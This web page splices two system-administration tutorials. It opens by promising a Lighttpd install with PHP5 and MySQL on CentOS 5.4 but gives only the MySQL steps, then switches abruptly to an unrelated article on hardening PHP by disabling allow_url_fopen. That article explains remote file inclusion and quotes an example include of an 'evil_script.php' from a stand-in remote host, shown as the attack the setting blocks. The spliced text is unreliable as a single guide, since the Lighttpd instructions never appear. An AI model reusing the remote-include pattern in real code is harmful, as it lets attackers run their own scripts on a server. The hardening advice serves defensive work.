Lighttpd is an open-source web server optimized for speed-critical environments. It's standards-compliant, secure and flexible. In this tutorial I'll show you how to install Lighttpd on a CentOS 5.4 server with PHP5 support (through FastCGI) and MySQL support.
1. Installing MySQL 5 Server
To install MySQL run this command from the shell:
# yum install mysql mysql-server
Enable MySQL server on boot and start MySQL server:
# chkconfig --levels 235 mysqld on
# service mysqld start
When it comes to security, ignorance is definitely not blissful. There are several methods to increase the security of your PHP environment.
In this article I will discuss how to secure PHP by hardening PHP 5 configuration.
1. allow_url_fopen ( enabled by default )
This directive allows PHP's file functions ( file_get_contents, include and require statements ) to retrieve data from remote locations, like FTP or HTTP.
If an attacker can manipulate the arguments to those functions, they can use a URL under their control as the argument and run their own remote scripts. The vulnerability is called Remote file inclusion or RFI.
; Disable allow_url_fopen in php.ini for security reasons
allow_url_fopen = Off
The setting can also be applied in apache's httpd.conf :
# Disable allow_url_fopen for security reasons
php_admin_flag allow_url_fopen Off
It prevents URLs from being used in PHP. A command like include ("http://www.example.com/evil_script.php") will not be allowed to execute. Only files that reside within your site can be included: include("/var/www/html/config.inc.php").Print This Post